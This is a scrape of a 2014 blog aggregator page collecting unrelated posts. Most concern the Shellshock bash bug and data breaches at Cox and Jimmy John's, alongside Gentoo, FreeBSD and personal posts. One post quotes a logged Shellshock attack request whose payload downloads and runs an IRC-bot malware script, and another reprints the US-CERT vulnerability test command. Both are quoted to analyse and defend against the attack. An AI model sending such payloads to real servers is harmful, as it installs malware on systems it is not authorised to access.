Planet 2014-09-30 10:01 UTC

Apple has released updates to insulate Mac OS X systems from the dangerous “Shellshock” bug, a pervasive vulnerability that is already being exploited in active attacks.

Patches are available via Software Update, or from the following links for OS X Mavericks, Mountain Lion, and Lion,

After installing the updates, Mac users can check to see whether the flaw has been truly fixed by taking the following steps:

* Open Terminal, which you can find in the Applications folder (under the Utilities subfolder on Mavericks) or via Spotlight search.

* Execute this command:
bash –version

* The version after applying this update will be:

OS X Mavericks:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13)
OS X Mountain Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12)
OS X Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken back by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, but yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”


“Please note that [COMPANY NAME] takes the security of your personal data very seriously.” If you’ve been on the Internet for any length of time, chances are very good that you’ve received at least one breach notification email or letter that includes some version of this obligatory line. But as far as lines go, this one is about as convincing as the classic break-up line, “It’s not you, it’s me.”

I was reminded of the sheer emptiness of this corporate breach-speak approximately two weeks ago, after receiving a snail mail letter from my Internet service provider — Cox Communications. In its letter, the company explained:

“On or about Aug. 13, 2014, “we learned that one of our customer service representatives had her account credentials compromised by an unknown individual. This incident allowed the unauthorized person to view personal information associated with a small number of Cox accounts. The information which could have been viewed included your name, address, email address, your Secret Question/Answer, PIN and in some cases, the last four digits only of your Social Security number or drivers’ license number.”

The letter ended with the textbook offer of free credit monitoring services (through Experian, no less), and the obligatory “Please note that Cox takes the security of your personal data very seriously.” But I wondered how seriously they really take it. So, I called the number on the back of the letter, and was directed to Stephen Boggs, director of public affairs at Cox.

Boggs said that the trouble started after a female customer account representative was “socially engineered” or tricked into giving away her account credentials to a caller posing as a Cox tech support staffer. Boggs informed me that I was one of just 52 customers whose information the attacker(s) looked up after hijacking the customer service rep’s account.

The nature of the attack described by Boggs suggested two things: 1) That the login page that Cox employees use to access customer information is available on the larger Internet (i.e., it is not an internal-only application); and that 2) the customer support representative was able to access that public portal with nothing more than a username and a password.

Boggs either did not want to answer or did not know the answer to my main question: Were Cox customer support employees required to use multi-factor or two-factor authentication to access their accounts? Boggs promised to call back with an definitive response. To Cox’s credit, he did call back a few hours later, and confirmed my suspicions.

“We do use multifactor authentication in various cases,” Boggs said. “However, in this situation there was not two-factor authentication. We are taking steps based on our investigation to close this gap, as well as to conduct re-training of our customer service representatives to close that loop as well.”

This sad state of affairs is likely the same across multiple companies that claim to be protecting your personal and financial data. In my opinion, any company — particularly one in the ISP business — that isn’t using more than a username and a password to protect their customers’ personal information should be publicly shamed.

Unfortunately, most companies will not proactively take steps to safeguard this information until they are forced to do so — usually in response to a data breach.  Barring any pressure from Congress to find proactive ways to avoid breaches like this one, companies will continue to guarantee the security and privacy of their customers’ records, one breach at a time.

Rückkehr des IPJ | 2014-09-29 19:17 UTC

Das Internet Protocol Journal war eines der besten Publikationen im Netzwerk-Sektor. Deshalb war ich recht enttäuscht als dieses im letzten Jahr eingestellt wurde. Um so erfreulicher, dass das IPJ mit neuen Sponsoren neu aufgelegt wurde. So habe ich meine Ausgabe am Wochenende im Briefkasten gehabt.
Noch ist auf der neuen Webseite noch nicht zu finden, wie die Print-Ausgabe aboniert werden kann. Die Online-Version kann aber — wie früher auch — online herunter geladen werden.
Die Haupt-Themen der aktuellen Ausgabe sind

  • Gigabit Wi-Fi
  • A Question of DNS Protocols

PostgreSQL Ebuilds Unified titanofold | 2014-09-29 18:21 UTC

I’ve finished making the move to unified PostgreSQL ebuilds in my overlay. Please give it a go and report any problems there.

Also, I know the comments are disabled. I have 27,186 comments to moderate. All of them are spam. I don’t want to deal with it.

(See my previous post on the topic for why.)

Bye bye Feedburner some useful things | 2014-09-29 14:26 UTC

Da mir die Verwendung von Feedburner keinen Mehrwert mehr bringt, habe ich die Feeds wieder auf die Original-Wordpress-Feeds umgestellt. Die Adresse des RSS-Feedss lautet nun:

Bitte aktualisiert eure Feedreader!

If you have any interest in IT security you probably heared of a vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software it's inevitable that this will have some impact. Machines get owned and abused to send Spam, DDoS other people or spread Malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure in the Internet in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans that were done by researchers. On Saturday I had a look at a few of such log entries, from my own servers and what other people posted on some forums. This was one of them: - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget;curl -O /var/tmp/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running a HTTP request where the user agent string which usually contains the name of the software (e. g. the browser) is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We obviously had already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.

For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP, it belongs to a dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweetet them. I tried their live support chat. I could chat with somebody who asked me if I'm a customer. He told me that if I want to report an abuse he can't help me, I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that's not possible. I wrote an email to their abuse department. Nothing happened.

On sunday noon the malware was still online. When I checked again on late Sunday evening it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.

When one of the servers in your responsibility is part of a large scale attack based on a threat that's headline in all news I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale you take action in such a situation is the difference between hundreds or millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.

Photo credit: Liam Quinn
This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid this repeats. And that's a difficult topic, because a 25 years old bug is not easy to avoid, especially because there are probably plenty of siblings of it around, that we have not found yet, just like this last week. But there are things that we can do as a whole environment to reduce the chances of problems like this to either happen or at least avoid that they escalate so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I've pushed for that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. It is indeed, among all the reasons, one I find very much good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is half unsolved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts are non-bash-requiring or you're using systemd (like me on the laptops), then it's mostly safe to switch to use dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash
That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately as I said it's mostly safe. I even found that some of the init scripts I wrote, that I checked with checkbashisms did not work as intended with dash, fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage on the output — this breaks facter-2 but not facter-1, I found out when it broke my Puppet setup.

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it only has one reference implementation, but it also seem to convince other people, new to coding, that it's a good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through puppet to all my servers. It should be enough, for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25 years old bug is enough to think twice about all of them, o I'll keep my options open.

This is actually why I like software biodiversity: it allows to have options to select different options when one components fail, and that is what worries me the most with systemd right now. I also hope that showing how bad bash has been all this time with its closed development will make it possible to have a better syntax-compatible shell with a proper parser, even better with a proper librarised implementation. But that's probably hoping too much.

The third BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

Rechtsstreit mit einem Geist My Universe | 2014-09-28 06:59 UTC

Das Update auf die jüngste Ghost Version 0.5.2 birgt einige Tücken — meine eigene Installationsanleitung deckt einige der neu hinzugekommenen Schwierigkeiten nicht ab, wobei selbige überwiegend daraus entstehen, dass der Geist bei mir unter FreeBSD seinen Dienst tun muss.

Die erste Hürde bestand in einer endlos langen Liste an Fehlermeldungen, ausgeworfen von einem harmlosen npm install --production. Obwohl Ghost bei mir für den Einsatz mit PostgreSQL konfiguriert ist, erzwingt es nun den Bau der SQLite Module, deren Abhängigkeiten natürlich nicht installiert waren — ein vermeintlich leicht zu behebendes Problem:

pkg update && pkg upgrade  
pkg ins sqlite3 py27-sqlite3  
Damit war zwar die Gestalt der Fehlermeldung verändert, gebannt war sie jedoch nicht. Bei tiefergehender Wühltätigkeit in den Fehlerlogs und diverser JSON- und JavaScript-Dateien durfte ich dann feststellen, dass an irgendeiner Stelle der Pfad für den Python-Interpreter hart verdrahtet gewesen sein muss, so dass die Umgebungsvariable PYTHON in diesem Fall gar nicht zum Tragen kam und ignoriert wurde.

Die Lösung des Problems ist recht simpel — ein Symlink löst das Problem (wenn auch nicht sehr elegant):

cd /usr/local/bin  
ln -s python2 python  
Danach bauten alle Abhängigkeiten jedenfalls anstandslos durch, und manuell (per npm start oder node index.js) ließ sich Ghost auch ohne weiteres starten. Doch hier fing der wirklich lustige Teil erst an, denn Supervisor konnte Ghost nicht dazu bewegen, sich nicht selbst sofort wieder zu beenden, was zu solch skurrilen Log-Einträgen führte:

2014-09-27 15:06:42,973 INFO spawned: 'ghost' with pid 40876  
2014-09-27 15:06:43,027 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:44,092 INFO spawned: 'ghost' with pid 40877  
2014-09-27 15:06:44,146 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:46,240 INFO spawned: 'ghost' with pid 40879  
2014-09-27 15:06:46,295 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:49,600 INFO spawned: 'ghost' with pid 40883  
2014-09-27 15:06:49,655 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:50,678 INFO gave up: ghost entered FATAL state, too many start retries too quickly  
Der Ghost-Prozess verabschiedete sich also umgehend wieder mit Exit-Status 0. Ja, richtig verstanden, Ghost macht die Grätsche, meldet aber, normal beendet worden zu sein. Und da Ghost von der Kommandozeile anstandslos startete und funktionierte, suchte ich die Schuld natürlich beim supervisord — vergeblich, wie ich im Nachhinein feststellen durfte.

Es war der renitente Geist, der sich (wieder mal) ungehorsam gegenüber seinem Prozess-Aufseher gab. Mangels klarer Ursache für dieses Verhalten half auch hier nur die Analyse von Logfiles (bedingt) und des Quellcodes. Stein des Anstoßes waren letztlich die Berechtigungen im content-Verzeichnis der Ghost Installation.

Während die Unterverzeichnisse data und images schon immer Schreibrechte für den Geist verlangten, sah das bei apps und themes anders aus — gerade letzteres durfte in meinem Setup nur gelesen werden, da ich dem ja noch recht unreifen Ghost möglichst wenig Gelegenheit bieten wollte, im Falle einer hackbaren Sicherheitslücke persistenten Schaden anzurichten (wie z. B. bösartiges JavaScript in das Theme einzuschmuggeln).

Temporär lässt sich das seltsame Verhalten von Ghost also abstellen, wenn man ihm die gewünschten Rechte einräumt — doch wie bei einem trotzigen Kind ist Nachgeben in diesem Fall vielleicht nicht die beste Idee. Deshalb habe ich im Ghost Forum einen entsprechenden Diskussionspunkt eröffnet, in der Hoffnung, dass Ghost in einem der nächsten Releases dann still akzeptiert, nicht überall auf der Festplatte herumkritzeln zu dürfen.

I’ve been blogging about my non-Gentoo work using my drupal site at  but since I may be loosing that server sometime in the future, I’m going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following urls (at least for now!)



Photo credit: Images_of_Money
Almost exactly 18 months after moving to Ireland I'm finally bound to receive my first Irish credit card. This took longer than I was expecting but at least it should cover a few of the needs I have, although it's not exactly my perfect plan either. But I guess it's better start from the top.

First of all, I have already credit cards, Italian ones that as I wrote before, they are not chip'n'pin which causes a major headache in countries such as Ireland (but UK too), where non-chip'n'pin capable cards are not really well supported or understood. This means that they are not viable, even though I have been using them for years and I have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels if I'm on vacation.

But the question becomes why do I need a credit card? The answer lies in the mess that the Irish banking system is: since there is no "good" bank over here, I've been using the same bank I was signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if for the whole quarter your bank account never goes below €2.5k. This is not the "usual" style I've seen from American banks where they expect that your average does not go below a certain amount, it does not matter if one day you have no money and the next you have €10k on it: if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card — for a while, NFC payments were excluded, so I tried to use it more, but very few merchants allowed that, and the €15 limit on its use made it quite impractical to pay most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are on the other hand free; there are sometimes charges for "oversea usage" (foreign transactions), and you are charged interests if you don't pay the full amount of the debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year. A whole lot more than Italy where it was €1.81 until they dropped it on the floor. So my requirements on a credit card are to essentially hide as much as possible these costs. Which essentially mean that just getting a standard AIB card is not going to be very useful: yes I would be saving money after the first 150 operations, but I would be saving more to save enough to keep those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point every €2 spent. Since for each point you get a €.01 discount at end of quarter, it's almost like a cashback, as long as you buy your groceries from Tesco (that I do, because it's handy to have the delivery rather than having to go out for that, especially for things that are frozen or that weight a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to get back the stamp duty price with just the cashback, but it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, mobile phone, …

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, adding a raise at work, and the results have been positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that ensures you're in control of the bank account, a proof of address, and a proof of identity.

The first is kinda obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill — the problem starts when you notice that they ask you for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more — the bank was the hardest to convince, for over an year they kept sending me a paper letter for every single wire I received with the exception of my pay, which included money coming from colleagues when I acted as a payment hub, PayPal transfer for verification purposes and Amazon KDP revenue, one per country! Luckily, they accepted a color printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving license or any other Irish ID. I made a proper copy of it, in color, and brought it to my doctor for certification, he stamped and dated and declared, but it was not okay. I brought it to An Post – the Irish postal service – and told them that Tesco wanted a specific declaration on it, and to see the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and I repeated Tesco's request; not only they refused to comply, but they told me that they are not allowed to do what Tesco was asking me to make them do, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me, having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages, to "friends or family" — in my case, the target would have been my brother in law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending four more cards also to friends and family, and in particular I wanted to have one sent to my mother, so that she can have a way to pay for things and debit them to me so I can help her out. Of course as I said it has a cost, and a hefty one. Ont he other hand, it allows you one more trick: you can pay for the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in an year to pay for it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank should be taking on the onus of paying for the first €15k debt I would incur and wouldn't be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders in other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which had feeble, laughable rewards program, but at least I have it, and it should be able to repay itself. I'm up to find a MasterCard card I can have to hedge my bets on the acceptance of the card – turns out that Visa is not well received in the Netherlands and in Germany – and that can repay itself for the stamp duty.

Signature Systems Inc., the point-of-sale vendor blamed for a credit and debit card breach involving some 216 Jimmy John’s sandwich shop locations, now says the breach also may have jeopardized customer card numbers at nearly 100 other independent restaurants across the country that use its products.

Earlier this week, Champaign, Ill.-based Jimmy John’s confirmed suspicions first raised by this author on July 31, 2014: That hackers had installed card-stealing malware on cash registers at some of its store locations. Jimmy John’s said the intrusion — which lasted from June 16, 2014 to Sept. 5, 2014 — occurred when hackers compromised the username and password needed to remotely administer point-of-sale systems at 216 stores.

Those point-of-sale systems were produced by Newtown, Pa., based payment vendor Signature Systems. In a statement issued in the last 24 hours, Signature Systems released more information about the break-in, as well as a list of nearly 100 other stores — mostly small mom-and-pop eateries and pizza shops — that were compromised in the same attack.

“We have determined that an unauthorized person gained access to a user name and password that Signature Systems used to remotely access POS systems,” the company wrote. “The unauthorized person used that access to install malware designed to capture payment card data from cards that were swiped through terminals in certain restaurants. The malware was capable of capturing the cardholder’s name, card number, expiration date, and verification code from the magnetic stripe of the card.”

Meanwhile, there are questions about whether Signature’s core product — PDQ POS — met even the most basic security requirements set forth by the PCI Security Standards Council for point-of-sale payment systems. According to the council’s records, PDQ POS was not approved for new installations after Oct. 28, 2013. As a result, any Jimmy John’s stores and other affected restaurants that installed PDQ’s product after the Oct. 28, 2013 sunset date could be facing fines and other penalties.

This snapshot from the PCI Council shows that PDQ POS was not approved for new installations after Oct. 28, 2013.
What’s more, the company that performed the security audit on PDQ — a now-defunct firm called Chief Security Officers — appears to be the only qualified security assessment firm to have had their certification authority revoked (PDF) by the PCI Security Standards Council.

In response to inquiry from KrebsOnSecurity, Jimmy John’s noted that of the 216 impacted stores, 13 were opened after October 28, 2013.

“We understood, from our point of sale technology vendor, that payment systems installed in those stores, as with all locations, were PCI compliant,” Jimmy Johns said in a statement. “We are working independently, and moving as quickly as possible, to install PCI compliant stand-alone payment terminals in those 13 stores.  This is being overseen by Jimmy John’s director of information technology, who will confirm completion of this work directly with each location.  As part of our broader response to the security incident, action has already been taken in those 13 stores, as well as the other impacted locations, to remove malware, and to install and assure the use of dual-factor authentication for remote access and encrypted swipe technology for store purchases.  In addition, the systems used in all of our stores are scanned every day for malware.”

For its part, Signature Systems says it has been developing a new payment application that features card readers that utilize point-to-point encryption capable of blocking point-of-sale malware.

Tech media has been all the rage this year with trying to hype everything out there as the end of the Internet of Things or the nail on the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason why the security issues found had been considered so nasty is because we know they are widely used.

First there was Heartbleed with its discoverers deciding to spend time setting up a cool name and logo and website for, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificate. This spawned some interest around OpenSSL at least, including the OpenBSD fork which I'm still not sure is going to stick around or not.

Just few weeks ago a dump of passwords caused major stir as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault if the photos of a bunch of celebrities were stolen and published on a bunch of sites — and will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about shellshock which I already dug into. What I promised on that post is looking at the problem from the angle of the project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and cater for corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers don't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is FSF's choice of UNIX shell. The fact that the man page states clearly It's too big and too slow. should tip people off but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using them — but that's also a big problem that caused this particular issue.

The health of bash was not considered good by anybody involved with it on a distribution level. It certainly was not considered good for me, as I moved to zsh years and years ago, and I have been working for over five years years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer as the GNU website calls him, Chet Ramey – and the sole point of contact for him are the mailing lists. The code is released in dumps: a release tarball on the minor version, then every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can notice this as when emerging bash, you'll see all the patches being applied one on top of the other.

There is no public SCM — yes there is a GIT "repository", but it's essentially just an import of a given release tarball, and then each released patch applied on top of it as a commit. Since these patches represent a whole point release, and they may be fixing different bugs, related or not, it's definitely not as useful has having a repository with the intent clearly showing, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff in code dumps.

This is not completely unknown in the GNU sphere, glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts sanity is being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years, not the particular vulnerability but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers up to now (it's done now), and I have been pushing for Gentoo to move to /bin/sh being provided by dash for a while, at the same time Debian did it already, and the result is that the vulnerability for them is way less scary.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but it's not developed like many other projects in the open but behind closed doors, with only one single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than you involved, and review publicly the patches that you're sent!

As if consumers weren’t already suffering from breach fatigue: Experts warn that attackers are exploiting a critical, newly-disclosed security vulnerability present in countless networks and Web sites that rely on Unix and Linux operating systems. Experts say the flaw, dubbed “Shellshock,” is so intertwined with the modern Internet that it could prove challenging to fix, and in the short run is likely to put millions of networks and countless consumer records at risk of compromise.

The bug is being compared to the recent Heartbleed vulnerability because of its ubiquity and sheer potential for causing havoc on Internet-connected systems — particularly Web sites. Worse yet, experts say the official patch for the security hole is incomplete and could still let attackers seize control over vulnerable systems.

The problem resides with a weakness in the GNU Bourne Again Shell (Bash), the text-based, command-line utility on multiple Linux and Unix operating systems. Researchers discovered that if Bash is set up to be the default command line utility on these systems, it opens those systems up to specially crafted remote attacks via a range of network tools that rely on it to execute scripts, from telnet and secure shell (SSH) sessions to Web requests.

According to several security firms, attackers are already probing systems for the weakness, and that at least two computer worms are actively exploiting the flaw to install malware. Jamie Blasco, labs director at AlienVault, has been running a honeypot on the vulnerability since yesterday to emulate a vulnerable system.

“With the honeypot, we found several machines trying to exploit the Bash vulnerability,” Blasco said. “The majority of them are only probing to check if systems are vulnerable. On the other hand, we found two worms that are actively exploiting the vulnerability and installing a piece of malware on the system. This malware turns the systems into bots that connect to a C&C server where the attackers can send commands, and we have seen the main purpose of the bots is to perform distributed denial of service attacks.”

The vulnerability does not impact Microsoft Windows users, but there are patches available for Linux and Unix systems. In addition, Mac users are likely vulnerable, although there is no official patch for this flaw from Apple yet. I’ll update this post if we see any patches from Apple.

Update, Sept. 29 9:06 p.m. ET: Apple has released an update for this bug, available for OS X Mavericks, Mountain Lion, and Lion.

The U.S.-CERT’s advisory includes a simple command line script that Mac users can run to test for the vulnerability. To check your system from a command line, type or cut and paste this text:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If the system is vulnerable, the output will be:

 this is a test
An unaffected (or patched) system will output:

 bash: warning: x: ignoring function definition attempt
 bash: error importing function definition for `x'
 this is a test
US-CERT has a list of operating systems that are vulnerable. Red Hat and several other Linux distributions have released fixes for the bug, but according to US-CERT the patch has an issue that prevents it from fully addressing the problem.

The Shellshock bug is being compared to Heartbleed because it affects so many systems; determining which are vulnerable and developing and deploying fixes to them is likely to take time. However, unlike Heartbleed, which only allows attackers to read sensitive information from vulnerable Web servers, Shellshock potentially lets attackers take control over exposed systems.

